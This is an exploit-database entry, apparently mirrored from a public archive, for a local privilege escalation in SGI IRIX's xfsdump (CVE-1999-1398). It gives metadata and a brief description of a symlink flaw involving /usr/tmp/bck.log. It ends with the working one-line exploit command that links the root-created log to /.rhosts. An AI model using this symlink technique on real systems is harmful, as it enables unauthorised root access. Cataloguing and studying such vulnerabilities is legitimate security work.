[] NeoSense
E X P L O I T S
title author type platform port cve id

SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation

Author: Yuri Volobuev
type: local
platform: irix
port: nan
date_added: 1997-05-07 
date_updated: 2017-11-16 
verified: 1 
codes: CVE-1999-1398;OSVDB-8562 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/472/info

The xfsdump program shipped with Irix 5.x and 6.x from SGI contains a vulnerability which could lead to root compromise. By creating a log file in /usr/tmp called bck.log, a user could create a symbolic link from this file to any file they wish to be created as root. This is turn could be used to compromise the system.

ln -sf /.rhosts /usr/tmp/bck.log
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.